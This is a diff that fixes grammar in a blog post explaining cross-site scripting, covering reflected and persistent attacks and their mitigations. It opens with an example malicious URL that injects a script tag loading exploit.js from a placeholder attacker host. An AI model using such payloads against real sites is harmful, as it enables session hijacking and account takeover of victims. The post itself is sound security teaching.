bt3gl/building_blog/content/web_vulnerabilities.md

 http://website.org?q=puppies<script%20src="http://attacker.com/exploit.js">
 ```

-3. If the victim clicks in the link, her/his browser runs the script (legitimate by the **Same Origin Policy**, *i.e* resources are shared between origins with same protocol, domain and port).
-The attacker now has control of the victim's identity in that website.
+3. If the victim clicks on the link, her/his browser runs the script (legitimate by the **Same Origin Policy**, * i.e.* resources are shared between origins with the same protocol, domain, and port).
+The attacker now has control of the victim's identity on that website.
 If the victim is the administrator, it is game over.

 ### Persistent Attack:

-XSS persistent attacks store a malicious script in the databases, which will retrieved by the users.
+XSS persistent attacks store a malicious script in the databases, which will be retrieved by the users.
 A typical scenario is the following:

-1. The attacker verifies that the target website has a XSS stored vulnerability (for example, allowing her/him to post text with HTML tags).
+1. The attacker verifies that the target website has an XSS stored vulnerability (for example, allowing her/him to post text with HTML tags).

 2. The attacker creates an account in the target website and posts something with a hidden script (similar to the one above).

 3. When anyone loads the page with that post, the script runs, and the attacker is able to hijack the victim's section.

 Additionally, in *password managers*, there is a risk of amplification of XSS bugs.
-In the web applications that use *[httponly](https://www.owasp.org/index.php/HttpOnly)* cookies, a successful exploitation of an XSS flaw may give the attacker a transient access to the user's account (and password).
+In the web applications that use *[httponly](https://www.owasp.org/index.php/HttpOnly)* cookies, successful exploitation of an XSS flaw may give the attacker transient access to the user's account (and password).

 ### Attempts of mitigation:

-* Servers should should use **Content Security Policy** (CSP) HTTP header, which allow the whitelist of resources contents.
+* Servers should use **Content Security Policy** (CSP) HTTP header, which allows the whitelist of resources contents.
 For instance, the *Content-Security-Policy* header disables inline JavaScript by default.

-* Servers can use the **HttpOnly** HTTP header which allows to set a cookie that is unavailable to client-side scripts.
+* Servers can use the **HttpOnly** HTTP header which allows setting a cookie that is unavailable to client-side scripts.

 * Search inputs should *always* be sanitized in both server-side and client-side.

 * Servers should redirect invalid requests.

 * Servers should invalidate sessions from different IP addresses.
-However this can be mitigate if the attacker is behind a web proxy or behind the same NAT IP.
+However, this can be mitigated if the attacker is behind a web proxy or behind the same NAT IP.

 * Clients should disabling scripts by default (for example with [NoScript](https://addons.mozilla.org/en-us/firefox/addon/noscript/)).